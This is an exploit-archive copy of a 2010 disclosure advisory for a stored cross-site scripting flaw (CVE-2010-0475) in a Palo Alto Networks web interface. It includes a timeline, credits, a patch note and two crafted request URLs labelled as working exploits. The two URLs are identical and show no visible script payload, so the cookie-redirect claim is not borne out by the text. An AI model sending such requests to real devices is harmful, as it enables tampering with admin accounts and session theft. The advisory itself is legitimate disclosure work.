Skip to content
cyberexploits
webapphardwaretext

Palo Alto Network Vulnerability - Cross-Site Scripting

Palo Alto Network Vulnerability - Cross-Site Scripting

Published on 2010-05-19

Source code

Pinned to commit 7eac4c3a2ce5
textplatforms/hardware/webapps/12660.txt7eac4c3a
raw
Palo Alto Network Vulnerability - Cross-Site Scripting (XSS)

------------------------------



Class: Cross-Site Scripting (XSS) Vulnerability

*CVE: CVE-2010-0475 *

*Remote: Yes

Local: Yes

Published: May 11, 2010 08:30AM *

Timeline:Submission to MITRE: 1/18/2010

Vendor Contact: 2/18/2010

Vendor Response: 2/18/2010

Patch Available: 5/2010 Patched in maintenance releases (3.1.1 & 3.0.9)

*Credit: Jeromie Jackson CISSP, CISM*

        COBIT & ITIL Certified

        President- San Diego Open Web Application Security Project (OWASP)

        Vice President- San Diego Information Audit & Control Association

(ISACA)

        SANS Mentor

        LinkedIn: www.linkedin.com/in/securityassessment

        Blog: www.JeromieJackson.com

        Twitter: www.twitter.com/Security_Sifu



Validated Vulnerable:

   Latest Version Per December 31, 2009



Discussion:



A Stored Cross-Site Scripting (XSS) vulnerability was found within the Palo

Alto interface. By crafting a URL that includes XSS code it is possible to

inject malicious data, redirect the user to a bogus replica of the real

website, or other nefarious activity.



Exploit:

Single Line working-

https://10.32.5.223:443/esp/editUser.esp?mode=edit&origusername=test&deviceC=localhost.localdomain&vsysC=localhost.localdomain%2Fvsys1&vsys=&profile=&cfgchange=&opasswd=&tpasswd=********&cpasswd=********&role=vsysadmin





&admin-role=%5Bobject+Object%5D&bSubmit=O



WORKING FOR REDIRECT TO LOAD cookies into URL.



https://10.32.5.223:443/esp/editUser.esp?mode=edit&origusername=test&deviceC=localhost.localdomain&vsysC=localhost.localdomain%2Fvsys1&vsys=&profile=&cfgchange=&opasswd=&tpasswd=********&cpasswd=********&role=vsysadmin&admin-role=%5Bobject+Object%5D&bSubmit=O



Solution:

A patch will be required from the vendor. It is recommended a routine to

sanitize user input be consistently implemented throughout the application

to mitigate other such occurrences within the application.



References:

OWASP Cross-Site Scripting (XSS) Attack Discussion

Rsnake's Cross-Site Scripting (XSS) Attack Cheat sheet



View on GitHub